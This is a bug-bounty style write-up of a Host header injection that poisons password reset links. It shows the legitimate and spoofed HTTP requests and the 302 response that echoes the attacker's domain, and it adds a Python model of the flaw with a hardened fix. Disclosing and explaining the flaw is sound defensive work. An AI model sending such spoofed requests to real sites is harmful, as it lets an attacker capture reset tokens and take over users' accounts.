Let me introduce one of my old findings today. This particular bug was discovered on one of the private sites for which I worked.
Before discussing the vulnerability, let us cover some background necessary for the attack.
Very often multiple websites are hosted on the same IP address. This is where the Host header comes in: it specifies which website should process the HTTP request, and the web server uses its value to dispatch the request to that site. Each website hosted on the same IP address is called a virtual host. But what happens if we specify an invalid Host header? If Apache receives a Host value that matches none of its virtual hosts, it hands the request to the first virtual host defined in httpd.conf, which acts as the default. Therefore it is possible to send requests with arbitrary Host headers to the first virtual host, and an application there that builds its own URLs from the Host header will reflect whatever value the client sent.
So the application I pentested, let's say abc.com, was affected by this kind of vulnerability; that is why, as an attacker, it was possible for me to send users of the site fake password reset links, with the link domain controlled by the attacker.
When a user of the site goes through the password reset procedure, the site presents this page (screenshot below).
The password reset procedure goes like this:
GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: www.abc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive
You can see the highlighted Host header value (www.abc.com, which makes this a valid request to the site).
Now let us spoof the Host header, using google.com as a stand-in for an attacker-controlled domain, and send the request:
GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive
Now see the response to the spoofed request. Both the Location header and the Set-Cookie domain follow the Host value we supplied, which shows the application is building URLs from the request's Host header:
HTTP/1.1 302 Found
Date:xxxxx
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: uclid=0; path=/; domain=.google.com
Location: http://google.com/?743&user_email=victimemail@gmail.com&flag=6&user_type=0
Vary: Accept-Encoding
Content-Length: 37317
Keep-Alive: timeout=2, max=400
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
And now see the screenshot of the victim's email, which shows the password reset link with the domain controlled by the attacker.
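The link-building flaw behind the 302 above, together with the Apache default-vhost behaviour from the background section, as an added example written for this page (it is not the author's code and not anything from abc.com). The vhost list, the allowed-host set, the canonical base URL, the function names and the trimmed copies of the two requests are all assumptions constructed for illustration.

```python
# Added example, not code from the original post or from abc.com: a small
# model of the two behaviours described above. apache_style_dispatch() mimics
# Apache handing an unrecognised Host to the first virtual host, and the two
# build_reset_link_* functions show a reset link that follows the Host header
# (what the 302 above reveals) next to one that ignores it. Every name and
# the sample requests below are constructed for illustration.
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed virtual host list in httpd.conf order; the first entry is Apache's default.
VHOSTS = [
    {"name": "abc", "server_names": {"abc.com", "www.abc.com"}},
    {"name": "other", "server_names": {"other.example"}},
]

# Assumed hosts the reset application is legitimately served under, and the
# base URL it should always use when writing links into e-mails.
ALLOWED_HOSTS = {"abc.com", "www.abc.com"}
CANONICAL_BASE = "https://www.abc.com"

# Constructed copies of the two requests shown on the page (headers trimmed).
LEGIT_REQUEST = (
    "GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1\r\n"
    "Host: www.abc.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: redacted\r\n"
    "\r\n"
)
SPOOFED_REQUEST = LEGIT_REQUEST.replace("Host: www.abc.com", "Host: google.com")


def apache_style_dispatch(host, vhosts=VHOSTS):
    """Return the vhost that serves `host`; unmatched hosts go to the first one."""
    for vhost in vhosts:
        if host.lower() in vhost["server_names"]:
            return vhost
    return vhosts[0]


def parse_request(raw):
    """Parse a raw HTTP/1.1 request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def _user_email(request):
    """Pull user_email out of the query string (the bare '743' has no value and is dropped)."""
    query = parse_qs(urlsplit(request["target"]).query)
    return query.get("user_email", [""])[0]


def build_reset_link_vulnerable(request, token):
    """Build the link from the client-supplied Host, as $_SERVER['HTTP_HOST']-style
    code does. With a spoofed Host the e-mailed link points at the attacker's
    domain, and the reset token travels with it."""
    host = request["headers"].get("host", "")
    query = urlencode({"user_email": _user_email(request), "token": token})
    return f"http://{host}/reset?{query}"


def build_reset_link_hardened(request, token):
    """Never use Host when writing the link; use the configured base URL instead.
    Returns None (the app should refuse and log) when Host is not one of ours,
    which also catches requests that reached this vhost only as Apache's default."""
    host = request["headers"].get("host", "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:
        return None
    query = urlencode({"user_email": _user_email(request), "token": token})
    return f"{CANONICAL_BASE}/reset?{query}"


def link_stays_on_site(link):
    """Sanity check for generated links: the host must be one of ours."""
    return urlsplit(link).hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    for raw in (LEGIT_REQUEST, SPOOFED_REQUEST):
        req = parse_request(raw)
        host = req["headers"]["host"]
        print("Host:", host, "-> vhost", apache_style_dispatch(host)["name"])
        print("  vulnerable:", build_reset_link_vulnerable(req, "t0k3n"))
        print("  hardened:  ", build_reset_link_hardened(req, "t0k3n"))
```

The hardened version makes two independent decisions: the link is always written from a configured base URL rather than from anything in the request, and a Host outside the allowlist is rejected outright. The second check is what an explicit catch-all default vhost in Apache would give you for free, but doing it in the application as well means a misordered httpd.conf does not silently reopen the bug.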